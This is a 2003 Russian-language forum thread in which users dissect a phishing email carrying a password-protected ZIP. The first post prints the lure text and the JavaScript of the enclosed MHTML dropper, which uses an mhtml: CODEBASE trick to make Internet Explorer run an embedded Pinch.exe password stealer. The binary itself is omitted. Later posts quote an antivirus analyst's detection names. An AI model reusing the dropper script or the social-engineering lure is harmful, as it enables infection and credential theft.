---|Ветка была без названия|---

← →
han_malign © (2003-10-09 14:03) [0]

Интересно обходит антивирус - атач в ZIP, пароль в контенте:

From "любое имя" <ayl@stranger.com>
Subject - "любой"
Mailer - Virtual MailSender; www.vpro.ru

Content
Achtung , Amogo! Привет в общем. Это Stinger, тебе свежее файло! Пароль на Архив : docs Раньше слать не vju, почта страшно глючит! Прикинь да?! Козлы! :(Там Html-список пассвордов к Share"am боссов. с ссылками ;), как договаривались. Надеюсь за тобой не заржавеет ;)! зюыю Как здоровьеб alch0 говорила ты простыл? Выздоравливай! :)

Attach: docs.zip

docs.zip -> docs.html
MIME-Version: 1.0 Content-Location: file:///Pinch.exe Content-Transfer-Encoding: base64 ............................... собсно бинарник этого самого Pinch.exe ............................... <title>Welcome - Home</title> <body bgcolor=black scroll=no> <SCRIPT> function malware() { s=document.URL;path=s.substr(-0,s.lastIndexOf("\\")); path=unescape(path); document.write( " <title>Welcome - Home</title><body scroll=no bgcolor=black><FONT face="Comic Sans MS" color=red style="position:absolute;top:20;left:90;z-index:100; font-size:2cm;">Sorry, Error On This Page! Please Open With Internet Explorer</center><object style="cursor:cross-hair" alt= "Sorry, Error On This Page! Please Open With Internet Explorer" classid="clsid:66666666-6666-6666-6666" CODEBASE="mhtml:"+path+"\\docs.html!file:///Pinch.exe"></object>") } setTimeout("malware()",150) </script>
- как вам???

← →
stone © (2003-10-09 14:05) [1]

Как только открыл ветку мой антивирус взвыл сообщением:
Scan type: Realtime Protection Scan
Event: Virus Found!
Virus name: Trojan.Sefex
File: C:\Documents and Settings\ovainsh\Local Settings\Temporary Internet Files\Content.IE5\ZSSO3NIE\forum[60].pl
Location: C:\Documents and Settings\ovainsh\Local Settings\Temporary Internet Files\Content.IE5\ZSSO3NIE

← →
han_malign © (2003-10-09 14:33) [2]

>stone © (09.10.03 14:05) [1]
- потому бинарник и не прописал(а то найдутся пытливые умы) :)))

← →
han_malign © (2003-10-09 15:14) [3]

HTML в архиве детектируется как TrojanDropper.JS.Mimail.b
Он инсталлирует в систему новую версию троянской программы Ld Pinch, детектирование которой будет
добавлено в очередной daily update.

--
С уважением, Гостев Александр
Вирусный аналитик, Kaspersky Lab.

← →
ZeroDivide © (2003-10-09 15:26) [4]

Чтож, очень грамотный социальный инжениринг.

Поздравляю, а теперь можешь и меня поздравить - позавчера мне на фидошный нетмыл тоже пришел троянчик, косящий под "обновление виндовс", причем пришел в 2-х вариантах от 2-х разных адресатов.

Как мля они адрес(инетнотранслированный от фидошного) мой узнали ума не приложу. Да и непонятно зачем они шлют его на адрес с доменом fidonet.org если заранее известно что через фидософт заразить этим гамном нельзя?

[5] NailMan © (09.10.03 16:00)
Думаю, это вопрос к тем, у кого твой адрес был в адресной книге.
Наверняка они заразились, троян прошерстил их адрексную книгу и по всем адресам оттуда послал письма.

---|Ветка была без названия|--- Найти похожие ветки